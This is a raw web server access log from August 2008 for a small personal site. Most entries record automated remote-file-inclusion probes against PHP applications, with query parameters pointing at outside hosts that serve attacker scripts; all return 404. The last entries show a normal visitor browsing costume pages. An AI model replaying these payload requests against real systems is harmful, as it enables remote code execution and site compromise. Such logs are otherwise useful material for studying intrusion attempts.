203.231.35.38 - - [22/Aug/2008:07:20:52 -0500] "GET /logs/access_log.1214524800//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 347 "-""Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
203.231.35.38 - - [22/Aug/2008:07:20:52 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 320 "-""Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
203.231.35.38 - - [22/Aug/2008:07:20:52 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 325 "-""Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
202.181.99.47 - - [22/Aug/2008:07:20:58 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://utilz.info/a4? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:07:20:59 -0500] "GET //config/dbutil.bck.php?confdir=http://utilz.info/a4? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
190.81.184.98 - - [22/Aug/2008:07:20:59 -0500] "GET /logs/access_log.1205539200//index.php?option=com_jreactions&mosConfig_absolute_path=http://lei.crt-limousin.fr/ortl/lag/id.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
75.69.246.191 - - [22/Aug/2008:07:21:16 -0500] "GET /logs/plugins/safehtml/safehtml.php?dir[plugins]=http://secret-wishes.net/images/roxx.jpg??? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
75.69.246.191 - - [22/Aug/2008:07:21:16 -0500] "GET /plugins/safehtml/safehtml.php?dir[plugins]=http://secret-wishes.net/images/roxx.jpg??? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
217.17.17.82 - - [22/Aug/2008:07:21:28 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 325 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
217.17.17.82 - - [22/Aug/2008:07:21:30 -0500] "GET /logs/access_log.1214524800//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
217.17.17.82 - - [22/Aug/2008:07:21:30 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
67.18.208.106 - - [22/Aug/2008:07:22:48 -0500] "GET /logs/access_log.1213401600//errors/needinit.php?GALLERY_BASEDIR=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
67.18.208.106 - - [22/Aug/2008:07:22:48 -0500] "GET //errors/needinit.php?GALLERY_BASEDIR=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.810"
67.18.208.106 - - [22/Aug/2008:07:22:48 -0500] "GET /logs//errors/needinit.php?GALLERY_BASEDIR=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
118.45.190.171 - - [22/Aug/2008:07:24:48 -0500] "GET /logs/access_log.1214524800//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 347 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
118.45.190.171 - - [22/Aug/2008:07:24:48 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 325 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
118.45.190.171 - - [22/Aug/2008:07:24:48 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 320 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
118.45.190.171 - - [22/Aug/2008:07:25:07 -0500] "GET /logs/access_log.1214524800//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 347 "-""Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
118.45.190.171 - - [22/Aug/2008:07:25:08 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 320 "-""Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
118.45.190.171 - - [22/Aug/2008:07:25:08 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 325 "-""Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
203.22.204.97 - - [22/Aug/2008:07:25:21 -0500] "GET /logs/errors.php?error=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.76"
203.22.204.97 - - [22/Aug/2008:07:25:21 -0500] "GET /errors.php?error=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.76"
202.181.99.47 - - [22/Aug/2008:07:27:14 -0500] "GET /logs/access_log.1214524800//include/write.php?dir=http://utilz.info/a4? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:07:27:15 -0500] "GET //include/write.php?dir=http://utilz.info/a4? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:07:27:15 -0500] "GET /logs//include/write.php?dir=http://utilz.info/a4? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
67.205.106.40 - - [22/Aug/2008:07:28:45 -0500] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://christiansongwriters.org/evanescence/cid.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.810"
67.205.106.40 - - [22/Aug/2008:07:28:45 -0500] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://christiansongwriters.org/evanescence/cid.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
72.9.233.10 - - [22/Aug/2008:07:29:12 -0500] "GET ///vwar/backup/errors.php?error=http://acc-advertising.com/img/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
87.22.37.144 - - [22/Aug/2008:07:29:16 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://home.bellavillapattaya.com/modul/mic.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
87.22.37.144 - - [22/Aug/2008:07:29:17 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://home.bellavillapattaya.com/modul/mic.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
70.87.80.202 - - [22/Aug/2008:07:29:56 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 311 "-""libwww-perl/5.810"
70.87.80.202 - - [22/Aug/2008:07:29:56 -0500] "GET //config/dbutil.bck.php?confdir=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.810"
87.22.37.144 - - [22/Aug/2008:07:30:12 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://home.bellavillapattaya.com/modul/mic.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
87.22.37.144 - - [22/Aug/2008:07:30:14 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://home.bellavillapattaya.com/modul/mic.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
70.87.80.202 - - [22/Aug/2008:07:30:32 -0500] "GET //config/dbutil.bck.php?confdir=http://c0d3d57.t35.com/ids.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.810"
70.87.80.202 - - [22/Aug/2008:07:30:32 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://c0d3d57.t35.com/ids.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.810"
87.22.37.144 - - [22/Aug/2008:07:30:37 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://home.bellavillapattaya.com/modul/mic.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
87.22.37.144 - - [22/Aug/2008:07:30:38 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://home.bellavillapattaya.com/modul/mic.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
202.181.99.47 - - [22/Aug/2008:07:30:57 -0500] "GET /logs/access_log.1208044800//modules/xfsection/modify.php?dir_module=http://utilz.info/a4? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:07:30:58 -0500] "GET //modules/xfsection/modify.php?dir_module=http://utilz.info/a4? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:07:30:58 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://utilz.info/a4? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:07:31:17 -0500] "GET /logs/access_log.1205366400//modules/xfsection/modify.php?dir_module=http://utilz.info/a4? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
64.22.85.186 - - [22/Aug/2008:07:32:57 -0500] "GET //cyberfolio/portfolio/msg/view.php?av=http://verinet.com.tr/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
190.137.181.149 - - [22/Aug/2008:07:33:07 -0500] "GET /logs/access_log.1208044800//modules/xfsection/modify.php?dir_module=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
190.137.181.149 - - [22/Aug/2008:07:33:12 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
190.137.181.149 - - [22/Aug/2008:07:33:16 -0500] "GET //modules/xfsection/modify.php?dir_module=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
70.87.80.202 - - [22/Aug/2008:07:34:14 -0500] "GET /logs/access_log.1214438400//config/dbutil.bck.php?confdir=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
70.87.80.202 - - [22/Aug/2008:07:34:30 -0500] "GET /logs/access_log.1214179200//config/dbutil.bck.php?confdir=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
70.87.80.202 - - [22/Aug/2008:07:36:52 -0500] "GET /logs/access_log.1214438400//config/dbutil.bck.php?confdir=http://c0d3d57.t35.com/ids.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
200.251.162.130 - - [22/Aug/2008:07:36:53 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://paijoe.007gb.com/rfi/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
200.251.162.130 - - [22/Aug/2008:07:36:53 -0500] "GET /logs/access_log.1214179200%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://paijoe.007gb.com/rfi/id.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.805"
200.251.162.130 - - [22/Aug/2008:07:36:53 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://paijoe.007gb.com/rfi/id.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
70.87.80.202 - - [22/Aug/2008:07:37:09 -0500] "GET /logs/access_log.1214179200//config/dbutil.bck.php?confdir=http://c0d3d57.t35.com/ids.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
202.181.99.47 - - [22/Aug/2008:07:38:26 -0500] "GET /logs/access_log.1214438400//include/write.php?dir=http://utilz.info/a4? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
201.130.79.132 - - [22/Aug/2008:07:40:01 -0500] "GET //config/dbutil.bck.php?confdir=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
201.130.79.132 - - [22/Aug/2008:07:40:01 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
201.130.79.132 - - [22/Aug/2008:07:40:01 -0500] "GET /logs/access_log.1212278400//config/dbutil.bck.php?confdir=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
201.130.79.132 - - [22/Aug/2008:07:40:02 -0500] "GET /logs/access_log.1216598400//config/dbutil.bck.php?confdir=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
201.130.79.132 - - [22/Aug/2008:07:40:02 -0500] "GET /logs/access_log.1212883200//config/dbutil.bck.php?confdir=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
62.119.28.109 - - [22/Aug/2008:07:40:19 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://paijoe.007gb.com/idnews.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
62.119.28.109 - - [22/Aug/2008:07:40:19 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://paijoe.007gb.com/idnews.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
201.130.79.132 - - [22/Aug/2008:07:41:04 -0500] "GET /logs/access_log.1211068800//config/dbutil.bck.php?confdir=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
201.130.79.132 - - [22/Aug/2008:07:41:04 -0500] "GET /logs/access_log.1205452800//config/dbutil.bck.php?confdir=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:07:42:01 -0500] "GET /logs/access_log.1214179200//include/write.php?dir=http://utilz.info/a4? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:07:44:18 -0500] "GET /logs/access_log.1213401600//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://utilz.info/a4? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:07:44:18 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://utilz.info/a4? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:07:44:18 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://utilz.info/a4? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
200.251.162.130 - - [22/Aug/2008:07:44:38 -0500] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://paijoe.007gb.com/idnews.txt? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
200.251.162.130 - - [22/Aug/2008:07:44:38 -0500] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://paijoe.007gb.com/idnews.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
89.218.85.18 - - [22/Aug/2008:07:45:55 -0500] "GET /logs/index.php?dept=http://merino.co.th/components/com_joomlaboard/template/id.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
89.218.85.18 - - [22/Aug/2008:07:45:55 -0500] "GET /index.php?dept=http://merino.co.th/components/com_joomlaboard/template/id.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
89.218.85.18 - - [22/Aug/2008:07:46:12 -0500] "GET /logs/index.php?dept=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
89.218.85.18 - - [22/Aug/2008:07:46:13 -0500] "GET /index.php?dept=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:07:46:43 -0500] "GET /logs//atom.php5?page=http://utilz.info/a4? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:07:46:43 -0500] "GET //atom.php5?page=http://utilz.info/a4? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
58.120.225.104 - - [22/Aug/2008:07:46:54 -0500] "GET /logs/access_log.1214524800//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 347 "-""Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
58.120.225.104 - - [22/Aug/2008:07:46:55 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 320 "-""Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
58.120.225.104 - - [22/Aug/2008:07:46:55 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 325 "-""Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
58.120.225.104 - - [22/Aug/2008:07:47:54 -0500] "GET /logs/access_log.1214524800//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
58.120.225.104 - - [22/Aug/2008:07:47:54 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
58.120.225.104 - - [22/Aug/2008:07:47:55 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 325 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
67.205.106.40 - - [22/Aug/2008:07:48:27 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://christiansongwriters.org/evanescence/cid.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
67.205.106.40 - - [22/Aug/2008:07:48:27 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://christiansongwriters.org/evanescence/cid.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
200.251.162.130 - - [22/Aug/2008:07:48:54 -0500] "GET /logs/index.php?redir=http://paijoe.007gb.com/idnews.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
200.251.162.130 - - [22/Aug/2008:07:48:55 -0500] "GET /index.php?redir=http://paijoe.007gb.com/idnews.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:07:49:11 -0500] "GET /logs/access_log.1206230400//claroline/tracking/userLog.php?rootSys=http://utilz.info/a4? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:07:49:11 -0500] "GET //claroline/tracking/userLog.php?rootSys=http://utilz.info/a4? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:07:49:11 -0500] "GET /logs/access_log.1206230400//claroline/phpbb/page_tail.php?includePath=http://utilz.info/a4? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:07:49:12 -0500] "GET /logs//claroline/tracking/userLog.php?rootSys=http://utilz.info/a4? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:07:49:12 -0500] "GET //claroline/phpbb/page_tail.php?includePath=http://utilz.info/a4? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:07:49:12 -0500] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://utilz.info/a4? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:07:49:40 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://utilz.info/a4? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:07:49:41 -0500] "GET //Neos_Chronos/header.php?base_folder=http://utilz.info/a4? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
81.15.55.100 - - [22/Aug/2008:07:49:57 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
81.15.55.100 - - [22/Aug/2008:07:49:58 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
81.15.55.100 - - [22/Aug/2008:07:49:58 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
81.15.55.100 - - [22/Aug/2008:07:49:58 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
81.15.55.100 - - [22/Aug/2008:07:49:59 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
89.208.43.121 - - [22/Aug/2008:07:50:00 -0500] "GET /logs/index.php?DOCUMENT_ROOT=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:07:50:00 -0500] "GET /index.php?DOCUMENT_ROOT=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.15.55.100 - - [22/Aug/2008:07:50:02 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
70.87.80.202 - - [22/Aug/2008:07:50:15 -0500] "GET /index.php?sourcedir=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
70.87.80.202 - - [22/Aug/2008:07:50:16 -0500] "GET /logs/index.php?sourcedir=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
89.208.43.121 - - [22/Aug/2008:07:50:27 -0500] "GET /logs/access_log.1216598400/index.php?DOCUMENT_ROOT=http://katsioulis.com/idd.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:07:50:30 -0500] "GET /index.php?DOCUMENT_ROOT=http://katsioulis.com/idd.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:07:50:30 -0500] "GET /logs/index.php?DOCUMENT_ROOT=http://katsioulis.com/idd.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
70.87.80.202 - - [22/Aug/2008:07:50:34 -0500] "GET /index.php?sourcedir=http://c0d3d57.t35.com/ids.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
70.87.80.202 - - [22/Aug/2008:07:50:34 -0500] "GET /logs/index.php?sourcedir=http://c0d3d57.t35.com/ids.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
81.15.55.100 - - [22/Aug/2008:07:50:36 -0500] "GET / HTTP/1.1" 200 1243 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
81.15.55.100 - - [22/Aug/2008:07:50:37 -0500] "GET /icons/back.gif HTTP/1.1" 200 216 "http://tomdolan.pconline.com/""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
81.15.55.100 - - [22/Aug/2008:07:50:37 -0500] "GET /icons/blank.gif HTTP/1.1" 200 148 "http://tomdolan.pconline.com/""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
81.15.55.100 - - [22/Aug/2008:07:50:37 -0500] "GET /icons/folder.gif HTTP/1.1" 200 225 "http://tomdolan.pconline.com/""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
202.181.99.47 - - [22/Aug/2008:07:50:52 -0500] "GET /logs//ashnews.php?pathtoashnews=http://utilz.info/a4? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:07:50:53 -0500] "GET //ashnews.php?pathtoashnews=http://utilz.info/a4? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
81.15.55.100 - - [22/Aug/2008:07:51:02 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
81.15.55.100 - - [22/Aug/2008:07:51:05 -0500] "GET /costume/thmb4.htm HTTP/1.1" 200 3298 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
81.15.55.100 - - [22/Aug/2008:07:51:05 -0500] "GET /costume/costm37.jpg HTTP/1.1" 200 9819 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
81.15.55.100 - - [22/Aug/2008:07:51:05 -0500] "GET /costume/costm38.jpg HTTP/1.1" 200 9710 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
81.15.55.100 - - [22/Aug/2008:07:51:05 -0500] "GET /costume/costm39.jpg HTTP/1.1" 200 9800 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
81.15.55.100 - - [22/Aug/2008:07:51:05 -0500] "GET /costume/costm41.jpg HTTP/1.1" 200 9976 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
81.15.55.100 - - [22/Aug/2008:07:51:05 -0500] "GET /costume/costm42.jpg HTTP/1.1" 200 9593 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
81.15.55.100 - - [22/Aug/2008:07:51:05 -0500] "GET /costume/costm43.jpg HTTP/1.1" 200 9745 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
81.15.55.100 - - [22/Aug/2008:07:51:06 -0500] "GET /costume/costm44.jpg HTTP/1.1" 200 9808 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
81.15.55.100 - - [22/Aug/2008:07:51:06 -0500] "GET /costume/costm45.jpg HTTP/1.1" 200 9735 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
81.15.55.100 - - [22/Aug/2008:07:51:06 -0500] "GET /costume/costm46.jpg HTTP/1.1" 200 9599 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
